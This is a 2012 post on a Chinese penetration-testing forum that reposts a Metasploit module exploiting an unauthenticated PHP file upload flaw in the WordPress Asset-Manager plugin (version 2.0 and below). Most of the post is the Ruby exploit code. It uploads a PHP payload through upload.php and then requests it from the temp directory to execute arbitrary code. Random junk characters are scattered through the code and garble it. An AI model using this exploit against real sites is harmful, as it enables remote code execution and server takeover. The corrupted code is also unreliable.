找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2525|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
* ?. q" M6 I% T6 B& o
( v$ \: ~- E7 p+ U2 x; [" q( \3 R* r##5 H: O7 B7 I" f- q, p5 [
# This file is part of the Metasploit Framework and may be subject to1 s7 ?: S- C2 p8 y$ c
# redistribution and commercial restrictions. Please see the Metasploit6 D, C, n3 m& Q+ w
# Framework web site for more information on licensing and terms of use.7 [+ A0 A( v' q) }; y8 \
#   http://metasploit.com/framework/+ `5 r8 N, l# {9 |& H
##
/ f  O9 w" m" ^0 L( M% O + e# ^& k# W& x' v" N- ~
require 'msf/core'0 M' ^6 o3 X8 N6 I6 |& J
require 'msf/core/exploit/php_exe'1 G# F5 v, b% |3 y
% g: f! u/ |$ q* a
class Metasploit3 < Msf::Exploit::Remote
; v$ f8 x( ]" _* ?7 [* d( T) f' b  Rank = ExcellentRanking4 m& v# O9 t% A* Y
  U  y2 @5 h4 i
  include Msf::Exploit::Remote::HttpClient
0 s% o( l. ]7 M+ E( ~  include Msf::Exploit:hpEXE1 b" h6 ^( J# E! }/ P
7 i2 @1 j- y/ ^: ?2 O3 {- f
  def initialize(info = {})4 X& ^- v! m, m8 I9 X8 d
    super(update_info(info,' }5 @% z7 G  k) s
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',; l7 a1 ^* [" b2 G: g
      'Description'    => %q{1 L4 ^0 c* D# t% j4 N' j! h! p
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress8 l% }* _4 w8 m, |1 R7 @# ^: Y
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a' f9 o' W4 I2 `$ q% t3 ^
        temp directory without authentication, which results in arbitrary code execution.
5 a5 q( o8 n7 W1 ^- @  R. c      },6 L% j3 J- a7 ]! t/ X8 Q  r. x  o
      'Author'         =>4 }# x+ G2 t# h0 {; U2 s( v9 @
        [
0 L! t5 H; D; Y! d2 D          'Sammy FORGIT', # initial discovery+ b8 j, d7 r' `( [5 a
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
# ?$ h8 k$ s5 ?- a* z( ]        ],
6 D" {5 M. ~8 B! N1 ]  s. e      'License'        => MSF_LICENSE,
; j6 D$ M! A# I5 T0 a% C4 g      'References'     =>- r; C+ d* c/ Y6 j& F6 f
        [: u* H/ V+ D5 ?3 F
          [ 'OSVDB', '82653' ],
  B% p4 g4 I" |, U          [ 'BID', '53809' ],
3 ^$ X* w; v: g2 n          [ 'EDB', '18993' ],
4 d, R" ~; d) w4 R8 U          [ 'URL', 'http:// www.myhack58.com /' ]' d. U/ K) W2 }
        ],+ U1 ^- H! Y3 k+ b1 ]/ d9 k, z
      'Payload'       =>
) u/ j1 B/ E. P" x* T/ X3 D9 X        {9 U+ b( u$ f. b& ]: v
          'BadChars' => "\x00",6 {' R, \# e: M0 J6 p$ Y  N3 Q
        },4 [1 p8 a& [& x3 O
      'Platform'       => 'php',
4 O3 V$ O% w7 }7 V8 |! S: h      'Arch'           => ARCH_PHP,( ]/ U/ z0 t8 ]9 ?
      'Targets'        =>' N$ _7 z9 b4 b% K
        [
4 x: I% W: X* @5 m8 L          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],( V- h8 g$ S% q" B1 V
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
3 Z! `2 p- V4 n        ],
# |' ?. G, i5 Y* j      'DefaultTarget' => 0,
* `5 r1 d6 |9 c# S      'DisclosureDate' => 'May 26 2012'))
$ N- v& N& T( V7 A/ H
. }0 X- n' d2 ~/ Y% g: P, z4 s' g! ?( h    register_options(& P( ]/ A+ L: n* [: x* C
      [
. N# I  U( e5 O3 b2 H        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
) h3 O1 a! C) H2 g      ], self.class)! X& g/ H# t: S) A$ ]" b/ S( L
  end0 k2 q7 a0 ^6 F; ^8 _

$ ^" K. e# k* G* P9 A1 b  def exploit8 C5 M3 _* c' G8 ^' {
    uri =  target_uri.path$ U( \' O# T& m3 y: }
    uri << '/' if uri[-1,1] != '/'1 E* p& p7 z+ x1 s7 F3 z& w+ d/ H+ {8 ]
    peer = "#{rhost}:#{rport}"3 M' k+ D0 [) G0 E
    payload_name = "#{rand_text_alpha(5)}.php"2 d6 y4 G. e7 Q6 M$ m( P: ^+ K5 @( e3 z
    php_payload = get_write_exec_payload(:unlink_self=>true)7 B4 X8 q, j) E' e$ k" B

) h: W8 A$ h# a& X" _2 r( w6 N    data = Rex::MIME::Message.new3 D( @! B) X' k/ t* B  k
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
! d' u' k! m* o. D! \+ X- ^    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
8 V: w4 `4 ~& M& t5 x
6 U$ D$ i' w+ P* n" Z* r    print_status("#{peer} - Uploading payload #{payload_name}")6 u& J$ T& T5 X0 x7 V
    res = send_request_cgi({
" F. A5 @2 U! Z' s# U' O3 J      'method'  => 'POST',3 N. C! [$ q+ G. \* C1 C& T
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",: f8 A0 {3 Y/ J$ z& @
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
  Q4 V/ @% T3 O3 `2 s( o* Y. v      'data'    => post_data
1 a4 W1 h4 L. x- V' T- C    })
; d- f) a9 ?9 O3 l' m
( |0 G- K' \: S, Y& r) V7 b+ S    if not res or res.code != 200 or res.body !~ /#{payload_name}/
! i4 q7 v! F! W5 p- P      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")8 i- o3 I; \/ r+ p. v
end
0 ]: F. g3 U" O0 o% A 6 c: F3 e0 e6 F1 _
    print_status("#{peer} - Executing payload #{payload_name}"); U8 H' x# J) w, o: {
    res = send_request_raw({
8 Y- h/ D1 y2 q: Q( o8 ]      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",: t% p& c: h6 p4 T! y8 `, N2 u
      'method'  => 'GET'
: c' t; `) j4 H) L    })
: c' d8 ]9 k2 F+ `. S" E' r1 i : M7 \# o7 ^! }/ X/ i
    if res and res.code != 200
1 s+ x$ e" v2 |& u      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
3 O) B, C$ i& x' c    end. k4 @8 v. L5 J1 s3 O
  end
  \. _9 W% G' a( i3 p4 F5 _: ^end
1 M8 K0 v& |5 p9 S* A" R0 t/ s
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表